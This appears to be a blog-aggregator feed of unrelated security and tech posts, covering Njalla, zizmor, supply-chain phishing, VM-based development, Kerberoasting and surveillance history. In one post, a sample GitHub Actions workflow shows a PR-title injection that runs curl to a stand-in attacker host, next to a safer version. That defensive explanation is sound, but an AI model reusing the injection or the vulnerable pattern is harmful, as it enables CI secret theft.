If preferrable you’re welcome to reach out via email to xxx (pubkey attached) or via XMPP/OMEMO to xxx. Thank you kindly and best regards! While I wasn’t expecting Njalla to offer in-depth strategic reasoning for this move, I nevertheless hoped for them to provide solid arguments as for why they believe Costa Rica is a good option for their operations and maybe even an explanation on why they haven’t notified their customers of the change. However, the reply that I got back was disappointing, to put it mildly: We do understand your concerns, but the reasoning or insights is not something we share. If you feel you can’t recommend our services any more, then of course you shouldn’t. That is totally up to you. Kind regards, Njalla It’s clear that Njalla is operating on a take it or leave it basis here. While they are entirely within their rights to do so, one could argue that using Njalla inherently requires a significant degree of trust. After all, they are the ones who legally own your domain . Given that, I think it’s fair to say that customers deserve at least some level of transparency in return. At least enough to feel confident that Njalla isn’t working against their interests. Note: There are many reasons why moving the company might make sense. While we can draw up as many conspiracy theories as we’d like, the most banal explanation might have to do with brokep being a Swedish citizen and supposedly still residing in the EU. 
Doing business within a place like Nevis, which the EU considers a tax haven and which is being grey-listed as non-cooperative tax jurisdiction every once in a while, can be a bit of a PITA . Not only is it unlikely for brokep to benefit from low-/no-tax advantages that the jurisdiction offers, it is on the contrary quite possible that EU CFC rules are intentionally hurting him, especially with a digital (low substance) business like Njalla , especially when dealing with cryptocurrency, especially with Monero, to discourage the average Joe Peter from doing business in jurisdictions that have historically been reserved for the bloc’s politicians and other elites. After all, the democractization of tax havens is certainly not something world leaders are in favor of. Costa Rica has managed to escape the bloc’s Annex I (in 2023) and Annex II (in 2024, approved 2025) and is not considered a low-tax country or tax haven. With CR joining the OECD’s CRS, it has certainly become easier for EU residents to do business in the Latin American country, despite its territorial tax regime. As boring as this sounds, but it might just be that brokep got sick of dealing with the EU charade around offshore tax havens – btw, hey, EU, how are things in Luxembourg, Cyprus and Monaco going? – and chose a more viable solution. I dug up Njalla ’s Terms of Service on the Internet Archive and found that the change seems to have occurred sometime between October 2, 2024, and December 16, 2024. Whether or not it’s legally permissible for a company to change something as fundamental as its jurisdiction or corporate registration without informing existing customers, I found the lack of communication troubling. What concerned me even more was that, after I pointed out the change, Njalla didn’t seem interested in offering any further explanation. On the contrary, their responses came across as an attempt to quietly brush the matter aside and move on. While the service continues to function as it always has, and I haven’t encountered any issues, I’m honestly uncertain about how to interpret the situation. As I’ve mentioned before, I deeply admire the work that brokep is doing, and I’m a strong supporter of Njalla ’s mission. I’ve been recommending their service for years, and I likely will continue to do so, although with reservations. That said, this situation has somewhat tarnished my perception of Njalla . Not only has their blog become less insightful over the years, but it also appears that they are actively concealing information from those who trust them: Their customers. With Njalla ’s lack of transparency and unsatisfactory responses, I’m uncertain about what to make of the situation. I’d assume that if you have a normal domain with Njalla , there’s probably little to worry about, provided the company hasn’t been sold to a new owner. The service seems to be operating as usual, and I haven’t heard of any malicious intent regarding domain ownership. That said, if you’re considering registering a domain to poke fun at a logistics provider or other international entities that might take issue with it, I wouldn’t be so confident that Njalla will still have Batman handling the situation. As long as you don’t provide your PII and use untraceable payment methods, however, the worst-case scenario is that Njalla shuts down your domain and won’t return it to you. I continue to hold several domains with Njalla . 
While I could migrate to another provider, I’m willing to wait, observe, and give Njalla the benefit of the doubt for now. That said, I will certainly be more cautious moving forward and think twice before registering any new domains with them. Frankly, there aren’t many trustworthy and reliable alternatives, especially ones backed by prominent figures with (for the most part) agreeable values. If you’re seeking services based in offshore jurisdictions, there’s a non-exhaustive list in the domains section of the infrastructure page. It’s important to note that when you allow someone else to register a domain on your behalf, you’re effectively entrusting them with ownership of the domain , meaning they could ultimately do whatever they wish with it. Therefore, trustworthiness is a critical factor when evaluating these services. Footnote: The artwork was generated using AI and further botched by me using the greatest image manipulation program .

1 views
ENOSUCHBLOG 1 months ago

One year of zizmor

This is a dual purpose post: I’ve released zizmor v1.13.0 , and zizmor has turned one year old 1 ! This release isn’t the biggest one ever, but it does include some nice changes (many of which were contributed or suggested by zizmor’s increasingly large community). Highlights include: A new (pedantic-level) undocumented-permissions audit rule, which flags explicit permission grants (like ) that lack an explanatory comment. Many thanks to @johnbillion for contributing this! (Long requested) support for disabling individual audit rules entirely, via in the configuration. Support for auto-fixing many of the obfuscation audit’s findings, including a brand new constant expression evaluator for github-actions-expressions that can unroll many common cases of obfuscated GitHub Actions expressions. Many thanks to @mostafa for contributing this, along with so much else of zizmor’s auto-fix functionality over the last few releases! Support for “grouped” configurations, which resolve a long-standing architectural limitation in how zizmor loads and applies a user’s configuration. The TL;DR of this change is that versions of zizmor prior to 1.13.0 could only ever load a single configuration file per invocation, which meant that invocations like wouldn’t honor any configuration files in or . This has been changed so that each input group (i.e. each input argument to ) loads its own isolated configuration. In practice, this should have no effect on typical users, since the average user likely only runs or . But it’s something to be aware of (and will likely benefit you) if you’re a bulk user! These changes build on a lot of other recent (v1.10.0 and later) improvements, which could easily be the subject of a much longer post. But I’d like to focus the rest of this post on some numbers for and reflections on the past year of zizmor’s growth. As of today (September 12, 2025), zizmor has: 26 unique audit rules , encompassing a wide range of reactive and proactive security checks for GitHub Actions workflows and action definitions. This is up from 10 rules in the first tagged release (v0.1.0), which predates the changelog. It also undercounts the growth of zizmor’s complexity and feature set, since many of the rules have been significantly enhanced over time. Just over 3000 stars on GitHub, growing from close to zero at the start of the year. Most of that growth was in the shape of a “hockey stick” during the first few months, but growth has been steady overall: About 3.2 million downloads from PyPI alone , just barely squeaking us into the top 10,000 most-downloaded packages on PyPI 2 . Potentially more interesting is the growth in PyPI downloads: around 1 in 5 of those downloads (633K precisely) were in the last month alone . Notably, PyPI is just one of several distribution channels for zizmor: the official Docker image has another ~140K downloads, the Homebrew formula has another ~50K, conda-forge has another ~90K, and so forth. And these are only the ones I can easily track! So, so many cool downstream users: cURL, CPython, PyPI itself, Rust, Rustls, Sigstore, Anubis, and many others are all running zizmor in their CI/CD to proactively catch potential security issues. In addition to these projects (who humble me with their use), I’ve also been thrilled to see entire communities and companies adopt and/or recommend zizmor: pyOpenSci , Grafana Labs , and Wiz have all publicly recommended zizmor based on their own experience or expertise. 
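To make the first highlight above a bit more concrete: an explicit permissions block with the kind of explanatory comments the undocumented-permissions rule asks for might look roughly like this hypothetical workflow snippet (not taken from zizmor's documentation):

  permissions:
    # checkout needs read access to repository contents
    contents: read
    # OIDC token used for trusted publishing
    id-token: write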
Roughly 50 contributors , excluding myself and bots, along with several dozen “regulars” who file bug reports and feature requests. This number is easily the most satisfying of the above: it’s a far cry from the project’s start, when I wasn’t sure if anyone would ever use it, let alone contribute to it. Some thoughts and observations from the past year. People like to use zizmor, even though it’s a security tool! Crazy! Most people, including myself , hate security tools : they are, as a class, frustrating to install and configure, obtuse to run, and are arrogantly incorrect in their assumption of user tolerance for signal over noise. My own negative experiences with security tooling made me hesitant to build zizmor in the open: I was worried that (1) no one would use it, or (2) lots of people would use it in anger , and hate it (and me) for it. To my surprise, this didn’t happen! The overwhelming response to zizmor has been positive: I’ve had a lot of people thank me for building it, and specifically for making it pleasant to use. I’ve tried to reflect on what exactly I did to succeed in not eliciting a “hate” reaction to zizmor, and the following things come to mind: It’s very easy to install and run: distributing it via PyPI (even though it’s a pure Rust binary) means that it’s a single or away for most users. It’s very fast by default: offline runs take tens of milliseconds for representative inputs; online runs are slower, but still fast enough to outpace typical CI/CD setups. In other words: people very rarely wait for zizmor to complete, or in the worst case wait no longer than they’re already waiting for the rest of their CI/CD. It strikes the right balance with its persona design: the default (“ regular ”) persona prioritizes signal over noise, while letting users opt into more noisy personae (like pedantic and auditor ) as they please. One outcome from this choice which has been (pleasantly) surprising is seeing users opt into a more sensitive persona than the default, including even enforcing zizmor at the pedantic or auditor level in their CI/CD. I didn’t expect this (I expected most users to ignore non-default personae), and it suggests that zizmor’s other usability-first design decisions afford us a “pain budget” that users are willing to spend on more sensitive checks. On a very basic level, I don’t really want zizmor to exist: what I really want is a CI/CD system that’s secure by construction , and that doesn’t require static analysis to be bolted onto it for a degree of safety. By analogy: I want the Rust of CI/CD, not C or C++ with a layer of ASan slapped on top. GitHub Actions could have been that system (and arguably still could be), but there appears to be relatively little internal political 3 appetite within GitHub for making that happen 4 . In this framing, I’ve come to see zizmor as an external forcing function on GitHub: a low-friction, low-complexity tool that reveals GitHub Actions’ security flaws is also a tool that gives the hardworking engineers inside of GitHub the kind of political ammunition they need to convince their leadership to prioritize the product itself. I’m not conceited enough to think that zizmor (or I) alone am the only such external forcing function: there are many others, including entire companies seeking to capitalize on GitHub Actions’ flaws. 
However, I do think the last year of zizmor’s development has seen GitHub place more public emphasis on security improvements to GitHub Actions 5 , and I would like to think that zizmor has played at least a small part in that. Six months ago, I would have probably said that zizmor is mostly done : I was happy with its core design and set of audits, and I was having trouble personally imagining what else would be reasonable to add to it. But then, stuff kept happening! zizmor’s user base has continued to identify new things that zizmor should be doing, and has continued to make contributions towards those things. They’ve also identified new ways in which zizmor should operate: the auto-fix mode (v1.10.0) and LSP support (v1.11.0) are just two examples of this. This has made me less certain about what “done” will look like for zizmor: it’s clear to me that a lot of other people have (very good!) ideas about what zizmor can and should do to make the GitHub Actions ecosystem safer, and I’m looking forward to helping to realize those ideas. Some specific things I see on the horizon: More interprocedural analysis: zizmor is largely “intraprocedural” at the moment, in the sense that it analyzes individual inputs (workflows or action definitions) in isolation. This approach makes zizmor simple, but it also leaves us with a partial picture of e.g. a repository’s overall CI/CD posture. As a simple example: the unpinned-uses audit will correctly flag any unpinned action usages, but it won’t detect transitively unpinned usages that cross input boundaries. Better support for large-scale users: it’s increasingly clear to me that a significant (and increasing) portion of zizmor’s userbase is security teams within bigger open source projects (and companies), who want to use zizmor as part of “estate management” for dozens, hundreds, or even thousands of individual repositories. zizmor itself doesn’t struggle to operate in these settings, but large scales make it harder to triage and incrementally address zizmor’s findings. I’m not sure exactly what an improved UX for bulk triage will look like, but some kind of GitHub App integration seems worth exploring 6 . A bigger architectural reevaluation: zizmor’s current architecture is naïve in the sense that individual audits don’t share or re-use computation between each other. For example, two audits that both evaluate GitHub Actions expressions will independently re-parse those expressions rather than caching and reusing that work. This is not a performance issue at zizmor’s current audit count, but will likely eventually become one. When this happens, I’ll likely need to think about a larger architectural change that allows audits to either share computed analysis state or push more analysis state into zizmor’s input collection phase. Another (unrelated) architectural change that’ll likely eventually need to happen involves , which zizmor currently uses extensively: its deprecated status is a long-term maintenance risk. My hope is that alternatives (like saphyr , which I’ve been following) will become sufficiently mature and feature-rich in the medium-long term to enable fully replacing (and potentially even some of our use of in e.g. and .). It depends on how you count: zizmor’s first commit was roughly 13 months ago, while its first tagged release (v0.1.0) was roughly 11 months ago. So I’m splitting the two and saying it’s been one year.  ↩ Number 9,047 as of time of writing.  ↩ Read: product leadership.
I have a great deal of faith in and respect for GitHub’s engineers, who seem to be uniformly upset about the slow-but-accelerating degradation of GitHub’s product quality.  ↩ A more cynical framing would be that GitHub has entered the “value strip-mining” phase of its product lifecycle, where offerings like GitHub Actions are kept alive just enough to meet contractual obligations and serve as a staging bed for the next round of “innovation” (read: AI in more places). Fixing longstanding flaws in GitHub Actions’ design and security model would not benefit this phase, so it is not prioritized.  ↩ Off the top of my head: immutable actions/releases , fixing action policies , acknowledging how dangerous is, &c.  ↩ This avenue of exploration is not without risks: my experience has been that many security tools that choose to go the “app” integration route end up as Yet Another Infernal Dashboard that security teams dread actually using.  ↩

0 views
fasterthanli.me 1 month ago

crates.io phishing attempt

Earlier this week it was an npm supply chain attack . Now it’s the turn of crates.io , the main public repository for Rust crates (packages). The phishing e-mail looks like this (via Andrew Gallant on BlueSky ), and it leads to a fake GitHub login page that looks like this (via Barre on GitHub ). Several maintainers received it — the issue is being discussed on GitHub . The crates.io team has acknowledged the attack and said they’d see if they can do something about it.

0 views
crtns 1 month ago

Why I Moved Development to VMs

I've had it with supply chain attacks. The recent inclusion of malware into the package was the last straw for me. Malware being distributed in hijacked packages isn't a new phenomenon, but this was an attack specifically targeting developers: it publicly dumped user secrets to GitHub and exposed private GitHub repos. I would have been a victim of this malware if I had not gotten lucky. I develop personal projects in TypeScript. Sensitive credentials are stored in my environment variables and configs. Personal documents live in my home directory. And I run untrusted code in that same environment, giving any malware full access to all my data. First, the attackers utilized a misconfigured GitHub Action in the repo using a common attack pattern built around a risky pull-request trigger. The target repo's secrets are available to the source repo's code in the pull request when using this trigger, which in the worst case can be used to read and exfiltrate them, just as happened in this incident. 💭 This trigger type is currently insecure by default . The GitHub documentation contains a warning about properly configuring permissions before using it, but when security rests on developers reading a warning in your docs, you probably have a design flaw that documentation won't fix. Second, they leveraged script injection. The workflow in question interpolated the PR title directly into a script step without parsing or validating the input beforehand. A malicious PR triggered inline execution of a modified script that sent a sensitive NPM token to the attacker (a minimal sketch of both the vulnerable and the safer pattern appears below). 💭 Combining shell scripts with templating is a GitHub Actions feature that is insecure by design . There is a reason why the GitHub documentation is full of warnings about script injection . A more secure system would require explicit evaluation of all inputs instead of direct interpolation of inputs into code. I'm moving to development in VMs to provide stronger isolation between my development environments and my host machine. Lima has become my tool of choice for creating and managing these virtual machines. It comes with a clean CLI as its primary interface, and a simple YAML-based configuration file that can be used to customize each VM instance. Despite having many years of experience using Vagrant and containers, I chose Lima instead. From a security perspective, the way Vagrant boxes are created and distributed is a problem for me. The provenance of these images is not clear once they're uploaded to Vagrant Cloud. To prove my point, I created and now own two Vagrant registries; to my knowledge, there's no way to verify the true ownership of any registry in Vagrant Cloud. Lima directly uses the cloud images published by each Linux distribution. Here's a snippet of the Fedora 42 template . Not perfect, but more trustworthy. I also considered Devcontainers, but I prefer the VM solution for a few reasons. While containers are great for consistent team environments or application deploys, I like the stronger isolation boundary that VMs provide. Container escapes and kernel exploits are a class of vulnerability that VMs can mitigate and containers cannot. Finally, the Devcontainer spec introduces complexity I don't want to manage for personal project development. I want to treat my dev environment like a persistent desktop where I can install tools without editing Dockerfiles. VMs are better suited to emulate a real workstation without the workarounds required by containers.
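Before getting into the VM configuration itself, here is a minimal, hypothetical GitHub Actions snippet (not the actual compromised workflow) showing untrusted PR-title interpolation next to the commonly recommended environment-variable mitigation.

```yaml
# Hypothetical workflow fragment illustrating the script-injection risk described above.
on: pull_request_target   # runs in the target repo's privileged context

jobs:
  demo:
    runs-on: ubuntu-latest
    steps:
      # VULNERABLE: the expression is expanded into the script text before the shell
      # runs, so a PR title like  "; curl https://attacker.example/steal; echo "
      # becomes part of the command and executes.
      - name: Unsafe interpolation of untrusted input
        run: echo "PR title: ${{ github.event.pull_request.title }}"

      # SAFER: hand the untrusted value to the shell as an environment variable,
      # so it is treated as data rather than as code.
      - name: Untrusted input passed via environment variable
        env:
          PR_TITLE: ${{ github.event.pull_request.title }}
        run: echo "PR title: $PR_TITLE"
```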
Out of the box, most Lima templates are not locked down, but Lima lets you clone and configure any template before creating or starting a VM. By default, Lima VMs enable read-only file-sharing between the host user's home directory and the VM, which exposes sensitive information to the VM. I configure each VM with project-specific file-sharing and no automatic port forwarding. Here's my configuration (a sketch of a similar locked-down template appears at the end of this post). This template can then be used to create a VM instance. After creation of the VM is complete, accessing it over SSH can be done transparently via the subcommand. The VM is now ready to be connected to my IDE. I'm mostly a JetBrains IDE user. These IDEs have a Remote Development feature that enables a near-local development experience with VMs. A client-server communication model over an SSH tunnel enables this to work. Connecting my IDE to my VM was a 5 minute process that included selecting my Lima SSH config for the connection and picking a project directory. The most time consuming part of this was waiting for the IDE to download the server component to the VM. After that, the IDE setup was done. I had a fully working IDE and shell access to the VM in the IDE terminals. I haven't found any features that don't work as expected. There is also granular control over SSH port-forwarding between the VM (Remote) and host (local) built in, which is convenient for me when I'm developing a backend application. The integration between Podman/Docker and these IDEs extends to the Remote Development feature as well. I can run a full instance of Podman within my VM, and once the IDE is connected to the VM's instance of Podman, I can easily forward listening ports from my containers back to my host. The switch to VMs took me an afternoon to set up, and I get the same development experience with actual security boundaries between untrusted code and my personal data. Lima has made VM-based development surprisingly painless, and I worry a lot less about the next supply chain attack.
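As referenced above, here is a rough sketch of what a locked-down, project-specific Lima template along these lines can look like. This is not the author's actual configuration, and the values (image URL, paths, sizes) are placeholders; the field names follow Lima's template format as I understand it, so compare against the templates that ship with Lima before using anything like this.

```yaml
# Hypothetical Lima template: share only one project directory, nothing else from the host.
images:
  # Use the distribution's own published cloud image, as Lima's bundled templates do.
  - location: "https://example.org/path/to/Fedora-Cloud-Base.qcow2"   # placeholder URL
    arch: "x86_64"

cpus: 4
memory: "8GiB"

# Replace the default read-only mount of the whole host home directory with a single
# writable project directory.
mounts:
  - location: "~/projects/my-app"
    writable: true
```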

0 views
James O'Claire 1 month ago

Contabo Defaults Encourage Using SSH Passwords

I recently started helping a less technical friend and had my first chance to see/use a Contabo VPS. I’ve been really surprised at their default security practices so far. Contabo’s default VPS creation seems to be root user and password? If you go to “Advanced”, the default is to create a user called “admin” (good!) with the option to supply a public SSH key. Our new server, which barely any bot knows exists, already gets 350 failed password login attempts an hour. Worse, these bots can see that password login is enabled on our server, meaning they know they should keep trying. 350 password attempts an hour against a strong password isn’t much, but eventually more bots will realize our IP accepts passwords and try harder. And after a password has been copy-pasted around enough, some compromised browser plugin, Discord plugin, or similar will eventually capture it and put it in a list. Contabo “knows” this, even if they don’t practice it: https://contabo.com/blog/how-to-use-ssh-keys-with-your-server Contabo is wrong to encourage SSH passwords via their VPS-creation defaults. They went out of their way to do that, likely to avoid putting roadblocks up for new users, but it’s bad security. When we hit an issue, we contacted Contabo support. They asked us to copy-paste our password so they could help troubleshoot. While I appreciate that level of support, assuming users have an SSH password and asking them to email it seems crazy to me. Now there is a record of that password and IP on both our email providers. So, two changes going forward: 1) Use public/private SSH keys. We can copy/paste public keys anywhere we want, which is safe. 2) Create future servers with a user other than root and disable root login, since root is both all-powerful and the username every bot hammers over SSH. And in the future, I’ll complain a bit less about DigitalOcean/AWS/GCP.
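For what it’s worth, both of those recommendations can be baked into server creation when a provider accepts cloud-init user data (many VPS panels expose a field for this; I haven’t checked exactly what Contabo’s form supports). A rough, illustrative sketch with a placeholder key:

```yaml
#cloud-config
# Illustrative cloud-init user data: non-root sudo user, key-only SSH, root login disabled.
users:
  - name: admin
    groups: [sudo]
    shell: /bin/bash
    sudo: ["ALL=(ALL) NOPASSWD:ALL"]
    ssh_authorized_keys:
      - ssh-ed25519 AAAAC3Nza...your-public-key-here laptop   # paste your own public key

# Refuse password-based SSH logins entirely; keys only.
ssh_pwauth: false

# Keep the root account locked so bots hammering "root" over SSH get nowhere.
disable_root: true
```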

0 views
James O'Claire 1 month ago

Mobile Trackers your Ad-Blocker Doesn’t Know About

This is the full list of the main API endpoints that apps send data to. It covers ~70k Android apps, and the smallest endpoint has roughly 90 apps sending data to it, meaning it’s unlikely to be an app developer’s own domain. Then I checked whether these domains appear in any of: https://github.com/StevenBlack/hosts , https://easylist.to/easylist/easylist.txt or https://easylist.to/easylist/easyprivacy.txt . I was surprised how many were NOT in any of the lists: over a third (127 domains), and individually each blocklist only covered about a third of these domains. I’m not currently going to open pull requests for these domains, as data collected at this scale could easily contain some perfectly acceptable use cases. I’ve tried to remove those that I recognize as acceptable so far. Here’s a Google sheet of the same data (feel free to leave comments).

0 views

Kerberoasting

I learn about cryptographic vulnerabilities all the time, and they generally fill me with some combination of jealousy (“oh, why didn’t I think of that”) or else they impress me with the brilliance of their inventors. But there’s also another class of vulnerabilities: these are the ones that can’t possibly exist in important production software, because there’s no way anyone could still do that in 2025. Today I want to talk about one of those ridiculous ones, something Microsoft calls “low tech, high-impact”. This vulnerability isn’t particularly new; in fact the worst part about it is that it’s had a name for over a decade, and it’s existed for longer than that. I’ll bet most Windows people already know this stuff, but I only happened to learn about it today, after seeing a letter from Senator Wyden to Microsoft , describing how this vulnerability was used in the May 2024 ransomware attack on the Ascension Health hospital system . The vulnerability is called Kerberoasting , and TL;DR it relies on the fact that Microsoft’s Active Directory is very, very old . And also: RC4. If you don’t already know where I’m going with this, please read on. A couple of updates: The folks on HN pointed out that I was using some incorrect terms in here (sorry!) and added some good notes, so I’m updating below. Also, Tim Medin, who discovered and named the attack, has a great post on it here . Microsoft’s Active Directory (AD) is a many-tentacled octopus that controls access to almost every network that runs Windows machines. The system uses centralized authentication servers to determine who gets access to which network resources. If an employee’s computer needs to access some network Service (a file server, say), an Active Directory server authenticates the user and helps them get securely connected to the Service. This means that AD is also the main barrier ensuring that attackers can’t extend their reach deeper into a corporate network. If an attacker somehow gets a toehold inside an enterprise (for example, because an employee clicks on a malicious Bing link ), they should absolutely not be able to move laterally and take over critical network services. That’s because any such access would require the employee’s machine to have access to specialized accounts (called “Service accounts”) with privileges to fully control those machines. A well-managed network obviously won’t allow this. This means that AD is the “guardian” that stands between most companies and total disaster. Unfortunately, Active Directory is a monster dragged from the depths of time. It uses the Kerberos protocol, which was first introduced in early 1989. A lot of things have happened since 1989! In fairness to Microsoft, Active Directory itself didn’t actually debut until about 1999; but (in less fairness), large portions of its legacy cryptography from that time period appear to still be supported in AD. This is very bad, because the cryptography is exceptionally terrible. Let me get specific. When you want to obtain access to some network resource (a “Service” in AD parlance), you first contact an AD server (called a KDC) to obtain a “ ticket ” that you can send to the Service to authenticate. This ticket is encrypted using a long-term Service “password” established at the KDC and the Service itself, and it’s handed to the user making the call. Now, ideally, this Service password is not really a password at all: it’s actually a randomly-generated cryptographic key. 
Microsoft even has systems in place to generate and rotate these keys regularly. This means the encrypted ticket will be completely inscrutable to the user who receives it, even if they’re malicious. But occasionally network administrators will make mistakes, and one (apparently) somewhat common mistake is to set up a Service that’s connected to an ordinary user account, complete with a human-generated password. Since human passwords are probably not cryptographically strong, the tickets encrypted using them are extremely vulnerable to cracking. This is very bad, since any random user — including our hypothetical laptop malware hacker — can now obtain a copy of such a ticket, and attempt to crack the Service’s password offline by trying many candidate passwords using a dictionary attack . The result of this is that the user learns an account password that lets them completely control that essential Service. And the result of that (with a few extra steps) is often ransomware. Isn’t that cute? Of course, it’s not. It’s actually a terrible design that should have been done away with decades ago. We should not build systems where any random attacker who compromises a single employee laptop can ask for a message encrypted under a critical password! This basically invites offline cracking attacks, which do not even need to be executed on the compromised laptop — they can be exported out of the network to another location and performed using GPUs and other hardware. There are a few things that can stop this attack in practice. As we noted above, if the account has a long enough (random!) password, then cracking it should be virtually impossible. Microsoft could prevent users from configuring services with weak human-generated passwords, but apparently they don’t — or at least not consistently, because this is something that’s happened many times (including at Ascension Health.) So let’s say you did not use a strong cryptographic key as your Service’s password. Where are you? Your best hope in this case is that the encrypted tickets are extremely challenging for an attacker to crack. That’s because at this point, the only thing preventing the attacker from accessing your Service is computing power. But — and this is a very weak “but” — computing power can still be a deterrent! In the “standard” authentication mode, tickets are encrypted with AES, using a key derived via 4,096 iterations of PBKDF2 hashing , based on the Service password and a per-account salt ( Update : this is not a truly random salt; it’s a combination of domain and principal name.) The salt means an attacker cannot easily pre-compute a dictionary of hashed passwords, and while the PBKDF2 (plus AES) isn’t an amazing defense, it puts some limits on the number of password guesses that can be attempted in a given unit of time. This page by Chick3nman gives some excellent password cracking statistics computed using an RTX 5090 . It implies that a hacker can try 6.8 million candidate passwords every second, using AES-128 and PBKDF2. This isn’t the end of the story. In fact it’s self-evident that this is not the end of the story, because Active Directory was invented in 1999, which means at some point we’ll have to deal with RC4. Here’s the thing. Anytime you see cryptography born in the 1990s and yet using AES, you cannot be dealing with the original. What you’re looking at is the modernized, “upgraded” version of the original.
The original probably used an abacus and witchcraft, or (failing that) at least some combination of unsalted hash functions and RC4 . And here’s the worst part: it turns out that in Active Directory, when a user does not configure a Service account to use a more recent mode, then Kerberos will indeed fall back to RC4, combined with unsalted NT hashes (basically, one iteration of MD4 .) The main implication of using RC4 (and NT hashing) is that tickets encrypted this way become hilariously, absurdly fast to crack. According to our friend Chick3nman , the same RTX 5090 can attempt 4.18 billion (with a “b”) password guesses every second. That’s roughly 1000x faster than the AES variant. As an aside, the NT hashes are not salted, which means they’re vulnerable to pre-computation attacks that involve rainbow tables . I had been meaning to write about rainbow tables recently on this blog, but had convinced myself that they mostly don’t matter, given that these ancient unsalted hash functions are going away. I guess maybe I spoke too soon? Update: see Tom Tervoort’s excellent comment below, which mentions that there is a random 8-byte “confounder” acting as a salt during key derivation. Clearly not enough. These “Kerberoasting” attacks have been around for ages: the technique and name is credited to Tim Medin who presented it in 2014 (and many popular blogs followed up on it) but the vulnerabilities themselves are much older. The fact that there are practical ransomware attacks using these ideas in 2024 indicates that (1) system administrators aren’t hardening things enough, but more importantly , (2) Microsoft is still not turning off the unsafe options that make these attacks possible. To give some sense of where we are, in October 2024, Microsoft published a blog post on how to avoid Kerberos-based attacks ( NB: I cannot say Kerberoasting again and take myself seriously) . The recommendations are all kind of dismal. They recommend that administrators should use proper automated key assignment, and if they can’t do that, then to try to pick “really good long passwords”, and if they can’t do that, to pretty please shut off RC4. But Microsoft doesn’t seem to do anything proactive, like absolutely banning obsolete legacy stuff , or being completely obnoxious and forcing admins to upgrade their weird and bad legacy configurations. Instead this all seems much more like a reluctant and half-baked bit of vulnerability management. I’m sure there are some reasons why this is, but I refuse to believe they’re good reasons, and Microsoft should probably try a lot harder to make sure these obsolete services go away. It isn’t 1999 anymore, and it isn’t even 2014. If you don’t believe me on these points, go ask Ascension Health.

0 views
Xe Iaso 1 month ago

We all dodged a bullet

This post and its online comment sections are blame-free zones. We are not blaming anyone for clicking on the phishing link. If you were targeted with such a phishing attack, you'd fall for it too; it's a matter of when, not if. Anyone who claims they wouldn't is wrong. This is also a bit of a rant. Yesterday one of the biggest package ecosystems had very popular packages get compromised . We're talking about basic utility functionality: the kinds of dependencies that are everywhere, and that nobody would even think could be harmful. Getting code into these packages means an almost guaranteed free path to production deployments. If an open proxy server (à la Bright Data or other botnets that the credit card network tolerates for some reason), an API key stealer, or worse had been sent through this chain (a chain of extreme luck on the attacker's part), then this would be a completely different story. We all dodged a massive bullet because all the malware did was modify the destination addresses of cryptocurrency payments mediated via online wallets like MetaMask . As someone adjacent to the online security community, I have a sick sense of appreciation for this attack. This was a really good attack. It started with a phishing email that I'd probably fall for if it struck at the right time. This is frankly a really good phishing email; breaking it down, it's a 10/10. Looking at it critically, the only part of it that stands out is the domain "npmjs.help" instead of "npmjs.com". Even then, that wouldn't really stand out to me because I've seen companies use new generic top-level domains to separate out things like the blog or the docs, not to mention the stack . One of my friends, qdot, also got the phishing email, and here's what he had to say: I got the email for it and was like "oh I'll deal with this later". Saved by procrastination! — qdot ( @buttplug.engineer ) September 8, 2025 at 2:04 PM With how widely used these libraries are, this could have been so much worse than it was. I can easily imagine a timeline where this wasn't just a cryptocurrency interceptor. Imagine if something this widely deployed, in an ecosystem where automated package bumps commonly trigger production releases, had done API key theft instead. You'd probably have more OpenAI API keys than you'd know what to do with. You could probably go for years without having to pay for AWS again. It is just maddening to me that a near Jia Tan-level chain of malware and phishing was wasted on cryptocurrency interception that won't even run in the majority of places those compromised libraries were actually used. When I was bumping packages around these issues, I found that most of these libraries were used in command line tools. This was an attack obviously targeted at the Web 3 ecosystem, as users of Web 3 tools are used to making payments with their browsers. With my black hat on, I think that the reason they targeted more generic packages instead of Web 3 packages was so that the compromise wouldn't be as noticed by the Web 3 ecosystem. Sure, you'd validate the rigging that helps you interface with MetaMask, but you'd never think that it would get monkey-patched by your color value parsing library. One of the important things to take away from this is that every dependency could be malicious. We should take the time to understand the entire dependency tree of our programs, but we aren't given that time. At the end of the day, we still have to ship things.

0 views
マリウス 1 month ago

Mass-Surveillance History & Trivia

Note: This post focuses on mostly Wikipedia-documented programs/acts and major events. Many additional local or classified efforts exist but are omitted if lacking a solid Wikipedia entry. Info: Years denote program start, reveal, or key legislative milestone. Organized chronologically with brief context and trivia. VENONA (USA/UK/AUS) [1943–1980] SIGINT program decrypting Soviet communications; Not domestic surveillance per se but foundational to Cold War signals intelligence. Project SHAMROCK (USA) [1945–1975] NSA predecessor harvested copies of most international telegraphs entering/leaving the U.S.; Ended after the Church Committee. UKUSA Agreement (from which Five Eyes derives) [1946] Signals intelligence alliance formalized publicly later; Underpins many joint programs. NSA founded (USA) [1952] Creation of the National Security Agency institutionalized large-scale SIGINT capabilities. COINTELPRO (USA) [1956–1971] FBI’s domestic counterintelligence program targeting civil rights groups, anti-war activists, and others; Involved infiltration and surveillance. Project MINARET (USA) [1967–1973] NSA watch-list program surveilling U.S. citizens (including MLK Jr.) without warrants; Exposed in 1975–76. ECHELON (Five Eyes) [Late 1960s onward] Global signals interception network (NSA, GCHQ, ASD, CSE, GCSB) monitoring satellite/microwave communications. Church & Pike Committees (USA) [1975–1976] Congressional inquiries exposing illegal domestic surveillance; Led to FISA (1978) and the FISC court. FISA & FISC (USA) [1978] Legal framework for foreign intelligence surveillance with secret court orders. BLARNEY / FAIRVIEW / STORMBREW / OAKSTAR (USA) [1978 onward] NSA “corporate partner” upstream collection families at backbone chokepoints. Clipper Chip & Skipjack (USA) [1993–1996] Government-proposed key-escrow encryption standard; Abandoned after public backlash and cryptanalytic concerns. SORM launched (Russia) [1995] “System for Operative Investigative Activities” requiring ISPs to install FSB access; Later expanded to SORM-2 (internet) and SORM-3 (deep metadata). Carnivore / DCS1000 (USA) [1997–2001] FBI packet-sniffing system for ISP-side interception. NSAKEY (USA) [1999 (alleged)] Reported Microsoft Windows cryptographic key controversy; Raised concerns about possible NSA backdoor. Onyx interception system (Switzerland) [2000] Satellite communications interception sites at Zimmerwald, Heimenschwand, Leuk; First publicized mid-2000s. Interception Modernisation Programme (UK) [2000–2006] (via RIPA ) Ambitious plan to expand traffic data retention and interception; Later morphed into follow-on initiatives. STELLAR WIND (USA) [2001–2007] Post-9/11 warrantless surveillance (content + metadata); Aspects later routed into FISA processes. Data Retention beginnings (EU) [2001] Post-9/11 debates culminated in the 2006 EU Data Retention Directive mandating telco retention (later invalidated in 2014, see below). SITEL lawful interception system (Spain) [2001] National police interception platform for phone/internet data. Total Information Awareness (USA) [2002–2003] DARPA’s 